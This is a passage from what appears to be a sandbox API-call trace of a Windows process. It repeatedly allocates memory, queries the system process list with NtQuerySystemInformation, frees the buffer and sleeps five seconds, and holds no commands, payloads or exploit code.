RegionSize=0xdea54*=0x20000) returned 0x0 [0209.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.711] 